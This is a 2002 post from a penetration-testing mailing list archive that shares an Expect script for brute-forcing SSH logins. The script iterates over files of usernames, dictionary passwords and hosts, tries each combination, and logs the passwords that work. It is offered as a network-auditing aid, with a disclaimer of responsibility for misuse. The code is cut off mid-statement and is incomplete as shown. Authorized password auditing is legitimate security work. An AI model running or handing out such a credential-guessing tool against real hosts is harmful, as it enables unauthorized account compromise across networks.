Penetration Testing mailing list archives

SSh brute forcer

From: James Shanahan <jshanahan () comcastpc com>
Date: 25 Jan 2002 18:07:59 -0000

This is an expect script that will allow you to specify a 
host file, user file, and a dictionary.  Extremely useful 
for auditing large networks where you can't manually 
log into every machine or don't fee like re-running 
something on every host.  Hope everyone finds it 

#!/usr/bin/expect -f 
#    Written by James Shanahan
(jshanahan () comcastpc com) 
#    and Erin Palmer(epalmer () comcastpc com) 
#    ssh brute forcer     
#    This will alow you to specify hosts, password 
lists, and a user 
#    I do not take any reponsibilty for what you do with 
this tool 
#    Hopefully it will make your life easier rather then 
making other 
#    peoples lives more difficult! 
set timeout 5 
set dictionary [lindex $argv 0] 
set file [lindex $argv 1] 
set user [lindex $argv 2] 

if {[llength $argv] != 3} { 
   puts stderr "Usage: $argv0 <dictionary-file> <hosts-
file> <user-file>\n" 
   exit } 

set tryHost [open $file r] 
set tryPass [open $dictionary r] 
set tryUser [open $user r] 

set passwords [read $tryPass] 
set hosts [read $tryHost] 
set login [read $tryUser] 

foreach username $login { 
foreach passwd $passwords { 
foreach ip $hosts { 
spawn ssh $username@$ip 
expect ":" 
   send "$passwd\n" 
set logFile [open $ip.log a] 
expect "L" { 
puts $logFile "password for $username@$ip is 
close $logFile 
set id [exp_pid] 
exec kill -INT $id   

James G. Shanahan Jr.
Security Engineer 
Comcast Corporation

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